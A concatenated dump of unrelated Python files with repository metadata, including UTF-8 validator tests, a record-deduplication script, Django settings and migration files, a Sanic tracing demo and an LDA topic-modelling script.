   UTF8_TEST_SEQUENCES.append(vs)
   # the following conform to the UTF-8 integer encoding scheme, but
   # valid UTF-8 only allows for Unicode code points up to U+10FFFF
   vs = ["First possible sequence length 5/6 (invalid codepoints)", []]
   vs[1].append((False, '\xf8\x88\x80\x80\x80'))
   vs[1].append((False, '\xfc\x84\x80\x80\x80\x80'))
   UTF8_TEST_SEQUENCES.append(vs)
   # 2.2 Last possible sequence of a certain length
   vs = ["Last possible sequence of a certain length", []]
   vs[1].append((True, '\x7f'))
   vs[1].append((True, '\xdf\xbf'))
   vs[1].append((True, '\xef\xbf\xbf'))
   vs[1].append((True, '\xf4\x8f\xbf\xbf'))
   UTF8_TEST_SEQUENCES.append(vs)
   # the following conform to the UTF-8 integer encoding scheme, but
   # valid UTF-8 only allows for Unicode code points up to U+10FFFF
   vs = ["Last possible sequence length 4/5/6 (invalid codepoints)", []]
   vs[1].append((False, '\xf7\xbf\xbf\xbf'))
   vs[1].append((False, '\xfb\xbf\xbf\xbf\xbf'))
   vs[1].append((False, '\xfd\xbf\xbf\xbf\xbf\xbf'))
   UTF8_TEST_SEQUENCES.append(vs)
   # 2.3 Other boundary conditions
   vs = ["Other boundary conditions", []]
   vs[1].append((True, '\xed\x9f\xbf'))
   vs[1].append((True, '\xee\x80\x80'))
   vs[1].append((True, '\xef\xbf\xbd'))
   vs[1].append((True, '\xf4\x8f\xbf\xbf'))
   vs[1].append((False, '\xf4\x90\x80\x80'))
   UTF8_TEST_SEQUENCES.append(vs)
   # 3.1 Unexpected continuation bytes
   vs = ["Unexpected continuation bytes", []]
   vs[1].append((False, '\x80'))
   vs[1].append((False, '\xbf'))
   vs[1].append((False, '\x80\xbf'))
   vs[1].append((False, '\x80\xbf\x80'))
   vs[1].append((False, '\x80\xbf\x80\xbf'))
   vs[1].append((False, '\x80\xbf\x80\xbf\x80'))
   vs[1].append((False, '\x80\xbf\x80\xbf\x80\xbf'))
   # All 64 continuation bytes in a row.
   s = ""
   for i in xrange(0x80, 0xbf):
      s += chr(i)
   vs[1].append((False, s))
   UTF8_TEST_SEQUENCES.append(vs)
   # 3.2 Lonely start characters
   vs = ["Lonely start characters", []]
   m = [(0xc0, 0xdf), (0xe0, 0xef), (0xf0, 0xf7), (0xf8, 0xfb), (0xfc, 0xfd)]
   for mm in m:
      s = ''
      for i in xrange(mm[0], mm[1]):
         # Each start byte followed by a space (so the sequence is cut short).
         s += chr(i)
         s += chr(0x20)
      vs[1].append((False, s))
   UTF8_TEST_SEQUENCES.append(vs)
   # 3.3 Sequences with last continuation byte missing
   vs = ["Sequences with last continuation byte missing", []]
   k = ['\xc0', '\xe0\x80', '\xf0\x80\x80', '\xf8\x80\x80\x80', '\xfc\x80\x80\x80\x80',
        '\xdf', '\xef\xbf', '\xf7\xbf\xbf', '\xfb\xbf\xbf\xbf', '\xfd\xbf\xbf\xbf\xbf']
   for kk in k:
      vs[1].append((False, kk))
   UTF8_TEST_SEQUENCES.append(vs)
   # 3.4 Concatenation of incomplete sequences
   vs = ["Concatenation of incomplete sequences", []]
   vs[1].append((False, ''.join(k)))
   UTF8_TEST_SEQUENCES.append(vs)
   # 3.5 Impossible bytes
   vs = ["Impossible bytes", []]
   vs[1].append((False, '\xfe'))
   vs[1].append((False, '\xff'))
   vs[1].append((False, '\xfe\xfe\xff\xff'))
   UTF8_TEST_SEQUENCES.append(vs)
   # 4.1 Examples of an overlong ASCII character
   vs = ["Examples of an overlong ASCII character", []]
   vs[1].append((False, '\xc0\xaf'))
   vs[1].append((False, '\xe0\x80\xaf'))
   vs[1].append((False, '\xf0\x80\x80\xaf'))
   vs[1].append((False, '\xf8\x80\x80\x80\xaf'))
   vs[1].append((False, '\xfc\x80\x80\x80\x80\xaf'))
   UTF8_TEST_SEQUENCES.append(vs)
   # 4.2 Maximum overlong sequences
   vs = ["Maximum overlong sequences", []]
   vs[1].append((False, '\xc1\xbf'))
   vs[1].append((False, '\xe0\x9f\xbf'))
   vs[1].append((False, '\xf0\x8f\xbf\xbf'))
   vs[1].append((False, '\xf8\x87\xbf\xbf\xbf'))
   vs[1].append((False, '\xfc\x83\xbf\xbf\xbf\xbf'))
   UTF8_TEST_SEQUENCES.append(vs)
   # 4.3 Overlong representation of the NUL character
   vs = ["Overlong representation of the NUL character", []]
   vs[1].append((False, '\xc0\x80'))
   vs[1].append((False, '\xe0\x80\x80'))
   vs[1].append((False, '\xf0\x80\x80\x80'))
   vs[1].append((False, '\xf8\x80\x80\x80\x80'))
   vs[1].append((False, '\xfc\x80\x80\x80\x80\x80'))
   UTF8_TEST_SEQUENCES.append(vs)
   # 5.1 Single UTF-16 surrogates
   vs = ["Single UTF-16 surrogates", []]
   vs[1].append((False, '\xed\xa0\x80'))
   vs[1].append((False, '\xed\xad\xbf'))
   vs[1].append((False, '\xed\xae\x80'))
   vs[1].append((False, '\xed\xaf\xbf'))
   vs[1].append((False, '\xed\xb0\x80'))
   vs[1].append((False, '\xed\xbe\x80'))
   vs[1].append((False, '\xed\xbf\xbf'))
   UTF8_TEST_SEQUENCES.append(vs)
   # 5.2 Paired UTF-16 surrogates
   vs = ["Paired UTF-16 surrogates", []]
   vs[1].append((False, '\xed\xa0\x80\xed\xb0\x80'))
   vs[1].append((False, '\xed\xa0\x80\xed\xbf\xbf'))
   vs[1].append((False, '\xed\xad\xbf\xed\xb0\x80'))
   vs[1].append((False, '\xed\xad\xbf\xed\xbf\xbf'))
   vs[1].append((False, '\xed\xae\x80\xed\xb0\x80'))
   vs[1].append((False, '\xed\xae\x80\xed\xbf\xbf'))
   vs[1].append((False, '\xed\xaf\xbf\xed\xb0\x80'))
   vs[1].append((False, '\xed\xaf\xbf\xed\xbf\xbf'))
   UTF8_TEST_SEQUENCES.append(vs)
   # 5.3 Other illegal code positions
   # Those are non-character code points and valid UTF-8 by RFC 3629
   vs = ["Non-character code points (valid UTF-8)", []]
   vs[1].append((True, '\xef\xbf\xbe'))
   vs[1].append((True, '\xef\xbf\xbf'))
   UTF8_TEST_SEQUENCES.append(vs)
   # Unicode replacement character
   vs = ["Unicode replacement character", []]
   vs[1].append((True, '\xef\xbf\xbd'))
   UTF8_TEST_SEQUENCES.append(vs)
# Populate the registry at import time.
setTestSequences()
def test_utf8():
   """
   These tests verify the UTF-8 decoder/validator on the various test cases from
   http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt

   Python 2 only: relies on xrange/unichr and byte-oriented str.
   """
   v = Utf8Validator()
   # Start with every pre-built (expected_valid, bytes) case.
   vs = []
   for k in UTF8_TEST_SEQUENCES:
      vs.extend(k[1])
   # All Unicode code points
   for i in xrange(0, 0xffff): # should by 0x10ffff, but non-wide Python build is limited to 16-bits
      if i < 0xD800 or i > 0xDFFF: # filter surrogate code points, which are disallowed to encode in UTF-8
         vs.append((True, unichr(i).encode("utf-8")))
   # 5.1 Single UTF-16 surrogates
   for i in xrange(0xD800, 0xDBFF): # high-surrogate
      ss = unichr(i).encode("utf-8")
      vs.append((False, ss))
   for i in xrange(0xDC00, 0xDFFF): # low-surrogate
      ss = unichr(i).encode("utf-8")
      vs.append((False, ss))
   # 5.2 Paired UTF-16 surrogates
   for i in xrange(0xD800, 0xDBFF): # high-surrogate
      for j in xrange(0xDC00, 0xDFFF): # low-surrogate
         ss1 = unichr(i).encode("utf-8")
         ss2 = unichr(j).encode("utf-8")
         vs.append((False, ss1 + ss2))
         vs.append((False, ss2 + ss1))
   # now test and assert ..
   for s in vs:
      v.reset()
      r = v.validate(bytearray(s[1]))
      res = r[0] and r[1] # no UTF-8 decode error and everything consumed
      assert res == s[0]
def test_utf8_incremental():
   """
   These tests verify that the UTF-8 decoder/validator can operate incrementally.

   Each validate() call returns (valid?, endsOnCodePoint?, chunkIndex, totalIndex);
   state carries over between calls until reset().
   """
   v = Utf8Validator()
   v.reset()
   # NOTE(review): bytearray(str) works only on Python 2; Python 3 would need
   # an explicit encoding here.
   assert (True, True, 15, 15) == v.validate(bytearray("µ@ßöäüàá"))
   v.reset()
   # 0xF5 can never start a valid sequence.
   assert (False, False, 0, 0) == v.validate(bytearray([0xF5]))
   ## the following 3 all fail on eating byte 7 (0xA0)
   v.reset()
   assert (True, True, 6, 6) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74, 0x65, 0x64]))
   assert (False, False, 1, 7) == v.validate(bytearray([0xED, 0xA0, 0x80]))
   v.reset()
   assert (True, True, 4, 4) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74]))
   assert (False, False, 3, 7) == v.validate(bytearray([0x65, 0x64, 0xED, 0xA0, 0x80]))
   v.reset()
   # Chunk ends mid-sequence (0xED needs continuations): valid so far but
   # does not end on a code point boundary.
   assert (True, False, 7, 7) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74, 0x65, 0x64, 0xED]))
   assert (False, False, 0, 7) == v.validate(bytearray([0xA0, 0x80]))
# Script entry point: run both UTF-8 validator test suites.
if __name__ == '__main__':
   """
   Run unit tests.
   """
   test_utf8_incremental()
   test_utf8()
| [
"[email protected]"
]
| |
a382122e088d085ebf613ab22954c0a051260e01 | 332e0fe0e109795a838ab75f91cacbd818eb8f26 | /examples/tech_locator.py | 430a9d69cc57fcef52eece431039f3d98c927476 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | yoyossy/open-city__dedupe | 08fb505dda14992cd35fd41c0ff5c5fb98d54d68 | 187d0d6eeeba23046d7155fb9e593b36e21388fe | refs/heads/master | 2021-01-15T19:22:36.191934 | 2012-07-23T14:48:39 | 2012-07-23T14:48:39 | 5,244,938 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,104 | py | import csv
import re
import os
#dedupe modules
from dedupe.training_sample import activeLearning, consoleLabel
from dedupe.blocking import trainBlocking, blockingIndex, mergeBlocks
from dedupe.predicates import *
import dedupe.core
import dedupe.clustering
def techLocatorImport(filename) :
    """Read the master-list CSV and return (data_d, header).

    data_d maps row index -> frozendict of cleaned column values (whitespace
    collapsed, quotes stripped, lowercased); header is the first CSV row.
    """
    records = {}
    with open(filename) as csv_file :
        rows = csv.reader(csv_file, delimiter=',', quotechar='"')
        # Python 2 csv reader: .next() pulls the header row off the stream.
        header = rows.next()
        for row_index, raw_row in enumerate(rows) :
            cleaned = {}
            for col_index, value in enumerate(raw_row) :
                # Collapse runs of spaces and embedded newlines to single spaces.
                value = re.sub(' +', ' ', value)
                value = re.sub('\n', ' ', value)
                cleaned[header[col_index]] = value.strip().strip('"').strip("'").lower()
            records[row_index] = dedupe.core.frozendict(cleaned)
    return(records, header)
def dataModel() :
    """Return the initial dedupe data model: four string fields, zero weights."""
    field_names = ('OrganizationName', 'Address', 'ZipCode', 'OrgPhone')
    fields = {}
    for field_name in field_names:
        fields[field_name] = {'type': 'String', 'weight' : 0}
    return {'fields': fields, 'bias' : 0}
def init(inputFile) :
    """Load the input CSV and build the field model.

    Returns (data_d, data_model, header) for the downstream dedupe pipeline.
    """
    records, header = techLocatorImport(inputFile)
    model = dataModel()
    return (records, model, header)
# user defined function to label pairs as duplicates or non-duplicates
def dictSubset(d, keys) :
    """Return a new dict with only the entries of *d* whose keys are in *keys*.

    Keys absent from *d* are silently skipped.
    """
    # Idiom: dict comprehension instead of dict() over a generator expression.
    return {k: d[k] for k in keys if k in d}
inputFile = "datasets/Tech Locator Master List.csv"
num_training_dupes = 200
num_training_distinct = 16000
numIterations = 100
numTrainingPairs = 30
import time
t0 = time.time()
data_d, data_model, header = init(inputFile)
print "importing data ..."
if os.path.exists('learned_settings.json') :
data_model, predicates = core.readSettings('learned_settings.json')
else:
#lets do some active learning here
training_data, training_pairs, data_model = activeLearning(data_d, data_model, consoleLabel, numTrainingPairs)
predicates = trainBlocking(training_pairs,
(wholeFieldPredicate,
tokenFieldPredicate,
commonIntegerPredicate,
sameThreeCharStartPredicate,
sameFiveCharStartPredicate,
sameSevenCharStartPredicate,
nearIntegersPredicate,
commonFourGram,
commonSixGram),
data_model, 1, 1)
core.writeSettings('learned_settings.json',
data_model,
predicates)
blocked_data = blockingIndex(data_d, predicates)
candidates = mergeBlocks(blocked_data)
print ""
print "Blocking reduced the number of comparisons by",
print int((1-len(candidates)/float(0.5*len(data_d)**2))*100),
print "%"
print "We'll make",
print len(candidates),
print "comparisons."
print "Learned Weights"
for k1, v1 in data_model.items() :
try:
for k2, v2 in v1.items() :
print (k2, v2['weight'])
except :
print (k1, v1)
print ""
print "finding duplicates ..."
print ""
dupes = core.scoreDuplicates(candidates, data_d, data_model, .5)
clustered_dupes = clustering.cluster(dupes, estimated_dupe_fraction = 0.4)
print "# duplicate sets"
print len(clustered_dupes)
orig_data = {}
with open(inputFile) as f :
reader = csv.reader(f)
reader.next()
for row_id, row in enumerate(reader) :
orig_data[row_id] = row
with open("output/TL_dupes_list_" + str(time.time()) + ".csv","w") as f :
writer = csv.writer(f)
heading_row = header
heading_row.insert(0, "Group_ID")
writer.writerow(heading_row)
dupe_id_list = []
for group_id, cluster in enumerate(clustered_dupes, 1) :
for candidate in sorted(cluster) :
dupe_id_list.append(candidate)
row = orig_data[candidate]
row.insert(0, group_id)
writer.writerow(row)
for id in orig_data :
if not id in set(dupe_id_list) :
row = orig_data[id]
row.insert(0, 'x')
writer.writerow(row)
print "ran in ", time.time() - t0, "seconds"
| [
"[email protected]"
]
| |
de7ede51aae8aea701206a53f518f0d5ac082ce5 | 0090d4ab68de301b77c6c69a58464136fa04ba49 | /trydjango/settings.py | a3933049574711d35e99e5e238ad8b94b8ac109f | []
| no_license | firdavsDev/Django_simple_blog | b70000194875d792838f916d035b89be59312cd9 | f5999cf30091fce2246f44a5a55d55071aeb7a99 | refs/heads/main | 2023-08-23T04:10:52.570457 | 2021-09-23T10:19:18 | 2021-09-23T10:19:18 | 409,543,186 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,905 | py | """
Django settings for trydjango project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent #resolves to the project root (two levels above this file)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-jod$glnf4*4&(_812i50)fb(9weaytnic1#!!*-5m42@jmbof*' #every Django project has its own special secret key
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True #if the site runs into any problem, the error details are reported to us through this
ALLOWED_HOSTS = []
# Application definition
# apps used inside the site must be registered here
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    #register the apps we created below
    'products',
    'pages',
    'blog',
]
#middleware through which most of our requests are secured/processed
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
#this path works like an <a href>: the root URL configuration module
ROOT_URLCONF = 'trydjango.urls'
import os
#our HTML template files are registered here
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        #point this at the directory holding our HTML code
        'DIRS': [os.path.join(BASE_DIR,"templates") ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'trydjango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
#the database engine is SQLite by default
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
#for images, CSS and JS files
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
]
| |
0733674fe504df151b23c469f99ef7d29df5489a | ac7828a5fb10daaba998a09b427de3076d3b06d8 | /cnems/bbc/migrations/0011_comments.py | 6f9bdeacd4e9f87e4b20563d4d02dab42fdb6293 | []
| no_license | zkq123/django_1 | 950b1e8b4f94542e78e17de2744d212a7ac00ac9 | 9c5b498f7314ad9283da32b4a0e3793674bb7a7f | refs/heads/master | 2022-11-07T02:12:33.318288 | 2018-12-08T02:26:19 | 2018-12-08T02:26:19 | 155,974,478 | 0 | 1 | null | 2022-10-07T22:55:44 | 2018-11-03T10:55:35 | Python | UTF-8 | Python | false | false | 765 | py | # Generated by Django 2.1.2 on 2018-12-04 12:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('bbc', '0010_remove_likes_sum'),
]
operations = [
migrations.CreateModel(
name='Comments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment_center', models.CharField(max_length=200)),
('news', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bbc.News')),
('users', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bbc.Users')),
],
),
]
| [
"[email protected]"
]
| |
58893a54c197fb68eeb0d035302bf64d8d6e53e9 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/3/gD3.py | aa7152104068969fce4fab0f59d40adbf339df10 | []
| no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'gD3':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
]
| |
ec782cbc862fb7d8fded12eba2199a87bd70e120 | b186f73f14b5e93e763bc284cc0ca5737ad40c4a | /blog/forms.py | aa355e8bb86cd10ec6099e3cf945812cc5097ee6 | []
| no_license | basmaaitbelarbi/blog_django | ba667174ecd7209c49b00a48e7f42b4fdf92c96d | af763b2db0704c9d41c2d3355a30f29b30ef8bf5 | refs/heads/master | 2021-05-23T14:41:36.841520 | 2020-04-24T00:25:03 | 2020-04-24T00:25:03 | 253,344,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | from django import forms
from .models import Comment, Post
#ntest cmass
class NewComment(forms.ModelForm):
    # ModelForm for submitting a comment: exposes only the commenter's
    # name, email and the comment body.
    class Meta:
        model = Comment
        fields = ('name', 'email', 'body')
class PostCreateForm(forms.ModelForm):
    # ModelForm for creating a blog post; the content field is rendered as
    # a multi-line textarea.
    title = forms.CharField(label='title')
    content = forms.CharField(label='content', widget=forms.Textarea)
    class Meta:
        model = Post
        fields = ['title', 'content']
| [
"[email protected]"
]
| |
9ac71ff258e15cccc153cde0ad3f3d89c6d93d2d | 3850b80059dc5105504c56300dbbc5c70d3ac533 | /models/__init__.py | a495e6c3da7339c6a90a4c7d428ad2be25088dba | []
| no_license | haohaom1/intrinsic-images | cea56f6991dbdde89dd26621716a08c5f51f7ac4 | e3e0ddf85b843c3aa93bccf717f80364a15c38b0 | refs/heads/master | 2022-12-05T08:37:31.138944 | 2021-08-12T16:07:06 | 2021-08-12T16:07:06 | 193,809,832 | 0 | 3 | null | 2022-11-22T03:59:22 | 2019-06-26T01:45:51 | Python | UTF-8 | Python | false | false | 34 | py | # file to make this folder a model | [
"[email protected]"
]
| |
15b6ae2d70b9799cb8748159e727ba2aff01ca67 | a7b4bd1db26f71ab941076691d894583e167a3fd | /tools/cli_auto_doc.py | 3fa4e46f23cc9b1663fdece8826ea5510b80263b | [
"Apache-2.0"
]
| permissive | Mirantis/stackalytics | c422ccb27baa3f1fd7e68b9732ba0203144a3657 | 96ec7c6c630a9f2532b808069e045d434bbac200 | refs/heads/master | 2021-01-18T21:58:38.904481 | 2017-01-25T11:14:12 | 2017-01-25T11:14:12 | 10,863,780 | 3 | 4 | Apache-2.0 | 2020-02-26T11:45:53 | 2013-06-22T11:17:28 | Python | UTF-8 | Python | false | false | 1,806 | py | # Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
try:
import ConfigParser as configparser
except ImportError:
import configparser
def split_multiline(value):
    """Split a multi-line option value into a list of stripped, non-empty lines."""
    lines = []
    for raw_line in value.split('\n'):
        stripped = raw_line.strip()
        if stripped:
            lines.append(stripped)
    return lines
def get_entry_points(config):
    """Return {option: [lines]} from the 'entry_points' section, or {} if absent."""
    try:
        section = config['entry_points']
    except KeyError:
        return {}
    return {option: split_multiline(value) for option, value in section.items()}
def make(cfg, dest):
    """Generate per-tool help files.

    Reads *cfg* (a setup.cfg-style file), finds the console_scripts entry
    points, and runs each tool with --help, capturing the output into
    <dest>/<tool>.txt.
    """
    parser = configparser.RawConfigParser()
    parser.read(cfg)
    config = {section: dict(parser.items(section))
              for section in parser.sections()}
    scripts = get_entry_points(config).get('console_scripts')
    if not scripts:
        return
    for entry in scripts:
        # Entry point lines look like "name = module:func"; the tool name
        # is everything before the '='.
        tool = entry.split('=')[0].strip()
        print('Running %s' % tool)
        command = '%(tool)s --help > %(dest)s/%(tool)s.txt' % {'tool': tool,
                                                               'dest': dest}
        os.system(command)
# Command-line entry: expects the destination folder as the sole argument.
# NOTE(review): runs unconditionally on import (no __main__ guard) -- this
# module is intended to be executed as a script only.
if len(sys.argv) < 2:
    print('Usage: cli_auto_doc <dest folder>')
    sys.exit(1)
print('Generating docs from help to console tools')
make(cfg='setup.cfg', dest=sys.argv[1])
| [
"[email protected]"
]
| |
3ec32164666ac523827540b3380e72da6133f4c2 | 0d73e045f83f1765b9d598f9cebb2ec328353c99 | /15A Reading the Program.py | 89eeeace4a4fbac67b9fb6dd0f9013bfac0e2e2d | []
| no_license | Jalbanese1441/Waterloo-CS-Circles-Solutions | 642553db986cf7d53af133eb79a9abc097107a91 | 0506e2f7f62ec9ff4a5fc412b0526995164844ab | refs/heads/master | 2023-02-01T18:09:57.375959 | 2020-12-18T23:50:18 | 2020-12-18T23:50:18 | 277,946,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | def getBASIC():
holder=[]
x=""
while x.endswith("END")==False:
x=input()
holder.append(x)
return holder
| [
"[email protected]"
]
| |
56bfee5ce1520cf5059f5913eee9d2238b793119 | eda3d6974a60a42a1ee35cd2327218029490a654 | /develop/sanic_aiozipkin_test.py | 9433fc32d133111cb645f42c7070691073e2669f | []
| no_license | 1260228859/EvanKao-ms | 4a4159123bfd3f3b960c9b81ca920f599fffc6cc | ae0e9dbf2803c6bd67ea8b0be012b64c57db7bbc | refs/heads/master | 2020-09-26T19:39:48.587556 | 2020-07-08T03:00:01 | 2020-07-08T03:00:01 | 226,328,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,131 | py | from sanic import Sanic, response
from sanic.response import json
import aiohttp
import aiozipkin as az
"""
integrate aiohttp to Sanic app, doc(CHN): https://www.jianshu.com/p/17bc4518b243
"""
host = '127.0.0.1'
port = 8000
zipkin_address = 'http://127.0.0.1:9411/api/v2/spans'
app = Sanic(__name__)
endpoint = az.create_endpoint('sanic_app', ipv4=host, port=port)
@app.listener('before_server_start')
async def init(app, loop):
    # Build the zipkin tracer once at startup and attach a trace-instrumented
    # aiohttp client session to the app so handlers can reuse both.
    tracer = await az.create(zipkin_address, endpoint, sample_rate=1.0)
    trace_config = az.make_trace_config(tracer)
    app.aiohttp_session = aiohttp.ClientSession(trace_configs=[trace_config], loop=loop)
    app.tracer = tracer
@app.listener('after_server_stop')
def finish(app, loop):
    # Close the shared aiohttp session, then shut down the event loop.
    loop.run_until_complete(app.aiohttp_session.close())
    loop.close()
@app.route("/")
async def test(request):
request['aiozipkin_span'] = request
with app.tracer.new_trace() as span:
span.name(f'HTTP {request.method} {request.path}')
print(span)
url = "https://www.163.com"
with app.tracer.new_child(span.context) as span_producer:
span_producer.kind(az.PRODUCER)
span_producer.name('produce event click')
return response.text('ok')
def request_span(request):
    """Open a new server-side trace span for *request* and tag it with HTTP metadata.

    Returns the span so callers can create child spans from its context.
    """
    with app.tracer.new_trace() as span:
        span.name(f'HTTP {request.method} {request.path}')
        # BUG FIX: 'http.path' appeared twice in the original dict literal;
        # the duplicate key silently overwrote the first entry.
        tags = {
            'http.path': request.path,
            'http.method': request.method,
            'http.route': request.url,
            'peer.ip': request.remote_addr or request.ip,
            'peer.port': request.port,
        }
        # Plain loop instead of a side-effect list comprehension.
        for key, value in tags.items():
            span.tag(key, value)
        span.kind(az.SERVER)
        return span
@app.route("/2")
async def tes2(request):
request['aiozipkin_span'] = request
span = request_span(request)
with app.tracer.new_child(span.context) as span_producer:
span_producer.kind(az.PRODUCER)
span_producer.name('produce event click')
return response.text('ok')
if __name__ == '__main__':
app.run(host="0.0.0.0", port=port, debug=True)
| [
"[email protected]"
]
| |
1a8b3763c8a94e48cf8da659c686babc72716600 | 80abe7427ca501da06a9507cefa52d5c290f2833 | /Chapter04/topic_modeling.py | 841891d56168915143ec57282aeab11713c75372 | []
| no_license | CodedQuen/Raspberry-Pi-3-Cookbook-for-Python-Programmers | 7910c9cf9ebaf6f42510bd531bf965fd03e6efe8 | 4a77452c4510fd9c7da62099a93fdbc95a86245a | refs/heads/master | 2022-06-10T04:36:59.316284 | 2020-05-05T10:18:33 | 2020-05-05T10:18:33 | 261,421,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,220 | py |
from nltk.tokenize import RegexpTokenizer
from nltk.stem.snowball import SnowballStemmer
from gensim import models, corpora
from nltk.corpus import stopwords
# Load input words
def load_words(in_file):
    """Return the lines of *in_file* as a list of strings, newlines stripped.

    BUG FIX: the original used `line[:-1]`, which chopped the final character
    of the last line whenever the file did not end with a newline. rstrip('\\n')
    removes only a trailing newline. Also iterates the file directly instead
    of materializing readlines().
    """
    lines = []
    with open(in_file, 'r') as f:
        for line in f:
            lines.append(line.rstrip('\n'))
    return lines
# Text preprocessing helper: tokenize, drop English stop words, then stem.
class Preprocedure(object):
    # Initialize the three NLTK operators once; they are reused per call.
    def __init__(self):
        # Create a regular expression tokenizer (word characters only).
        self.tokenizer = RegexpTokenizer(r'\w+')
        # get the list of English stop words
        self.english_stop_words= stopwords.words('english')
        # Create a Snowball stemmer for English
        self.snowball_stemmer = SnowballStemmer('english')
    # Tokenizing, stop word removal, and stemming.
    # Returns a list of stemmed, lowercase tokens for in_data.
    def procedure(self, in_data):
        # Tokenize the lowercased string
        token = self.tokenizer.tokenize(in_data.lower())
        # Remove the stop words
        tokenized_stopwords = [x for x in token if not x in self.english_stop_words]
        # Perform stemming on the remaining tokens
        token_stemming = [self.snowball_stemmer.stem(x) for x in tokenized_stopwords]
        return token_stemming
# Script entry point: preprocess the input corpus, build a bag-of-words
# representation, fit a 2-topic LDA model, and print the top words per topic.
# Python 2 only (print statements).
if __name__=='__main__':
    # File containing linewise input data
    in_file = 'data_topic_modeling.txt'
    # Load documents, one per line
    element = load_words(in_file)
    # Create a preprocedure object (tokenizer + stop words + stemmer)
    preprocedure = Preprocedure()
    # Create a list of token lists, one per document
    processed_tokens = [preprocedure.procedure(x) for x in element]
    # Create a dictionary based on the tokenized documents
    dict_tokens = corpora.Dictionary(processed_tokens)
    # Bag-of-words corpus: each document as (token_id, count) pairs
    corpus = [dict_tokens.doc2bow(text) for text in processed_tokens]
    # Generate the LDA model based on the corpus we just created
    num_of_topics = 2
    num_of_words = 4
    ldamodel = models.ldamodel.LdaModel(corpus,
            num_topics=num_of_topics, id2word=dict_tokens, passes=25)
    print "Most contributing words to the topics:"
    for item in ldamodel.print_topics(num_topics=num_of_topics, num_words=num_of_words):
        print "\nTopic", item[0], "==>", item[1]
| [
"[email protected]"
]
| |
